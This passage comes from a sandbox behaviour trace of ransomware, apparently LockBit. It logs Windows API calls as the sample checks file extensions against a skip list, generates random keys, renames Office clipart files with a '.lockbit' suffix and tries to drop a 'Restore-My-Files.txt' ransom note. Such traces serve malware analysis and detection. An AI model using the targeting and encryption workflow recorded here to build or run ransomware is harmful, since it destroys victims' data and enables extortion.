(lpString1=".mwb", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.323] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.323] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.323] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.323] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.323] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.323] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.lockbit") returned 72 [0102.323] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0102.324] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.324] malloc (_Size=0x40068) returned 0x1ff1e60 [0102.324] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=26332) returned 1 [0102.324] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.325] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0102.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0102.326] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.332] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.332] malloc (_Size=0xa6) returned 0x3df0008 [0102.332] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x3df0008, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.335] free (_Block=0x3df0008) [0102.335] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.335] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.335] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.335] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x530f3800, ftCreationTime.dwHighDateTime=0x1bd4b38, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x530f3800, ftLastWriteTime.dwHighDateTime=0x1bd4b38, nFileSizeHigh=0x0, nFileSizeLow=0x6cd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN01174_.WMF", cAlternateFileName="")) returned 1 [0102.335] lstrcmpiW (lpString1=".", lpString2="AN01174_.WMF") returned -1 [0102.335] lstrcmpiW (lpString1="..", lpString2="AN01174_.WMF") returned -1 [0102.335] PathFindExtensionW (pszPath="AN01174_.WMF") returned=".WMF" [0102.335] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.335] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.335] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.335] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.335] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.335] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.335] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.335] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.335] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.335] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.335] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.335] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.335] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.335] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.336] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.336] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN01174_.WMF") returned 1 [0102.336] lstrcmpiW (lpString1="ntldr", lpString2="AN01174_.WMF") returned 1 [0102.337] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN01174_.WMF") returned 1 [0102.337] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN01174_.WMF") returned 1 [0102.337] lstrcmpiW (lpString1="autorun.inf", lpString2="AN01174_.WMF") returned 1 [0102.337] lstrcmpiW (lpString1="thumbs.db", lpString2="AN01174_.WMF") returned 1 [0102.337] lstrcmpiW (lpString1="iconcache.db", lpString2="AN01174_.WMF") returned 1 [0102.337] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.337] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned=".WMF" [0102.337] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.337] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.337] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.338] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.338] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.338] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.338] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.lockbit") returned 72 [0102.338] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0102.338] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.338] malloc (_Size=0x40068) returned 0x1ff1e60 [0102.338] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=27858) returned 1 [0102.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.339] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0102.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.339] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0102.339] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.346] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.346] malloc (_Size=0xa6) returned 0x3df0008 [0102.346] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x3df0008, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0102.349] free (_Block=0x3df0008) [0102.349] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.349] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.349] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.349] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbf4f00, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8cbf4f00, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xea2, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN01184_.WMF", cAlternateFileName="")) returned 1 [0102.349] lstrcmpiW (lpString1=".", lpString2="AN01184_.WMF") returned -1 [0102.349] lstrcmpiW (lpString1="..", lpString2="AN01184_.WMF") returned -1 [0102.349] PathFindExtensionW (pszPath="AN01184_.WMF") returned=".WMF" [0102.349] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.349] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.349] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.349] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.349] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.349] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.349] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.349] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.349] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.349] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.350] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.350] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN01184_.WMF") returned 1 [0102.351] lstrcmpiW (lpString1="ntldr", lpString2="AN01184_.WMF") returned 1 [0102.351] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN01184_.WMF") returned 1 [0102.351] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN01184_.WMF") returned 1 [0102.351] lstrcmpiW (lpString1="autorun.inf", lpString2="AN01184_.WMF") returned 1 [0102.351] lstrcmpiW (lpString1="thumbs.db", lpString2="AN01184_.WMF") returned 1 [0102.351] lstrcmpiW (lpString1="iconcache.db", lpString2="AN01184_.WMF") returned 1 [0102.351] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.351] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned=".WMF" [0102.351] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.351] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.351] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.352] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.352] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.352] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.352] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.352] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.352] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.352] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.lockbit") returned 72 [0102.352] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0102.352] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.352] malloc (_Size=0x40068) returned 0x1ff1e60 [0102.352] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3746) returned 1 [0102.352] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0102.353] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0102.353] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0102.382] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.382] malloc (_Size=0xa6) returned 0x3df0008 [0102.382] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x3df0008, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0102.382] free (_Block=0x3df0008) [0102.382] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.382] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.382] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.382] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8335e700, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8335e700, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0x16cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN01216_.WMF", cAlternateFileName="")) returned 1 [0102.382] lstrcmpiW (lpString1=".", lpString2="AN01216_.WMF") returned -1 [0102.383] lstrcmpiW (lpString1="..", lpString2="AN01216_.WMF") returned -1 [0102.383] PathFindExtensionW (pszPath="AN01216_.WMF") returned=".WMF" [0102.383] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".diagcfg", 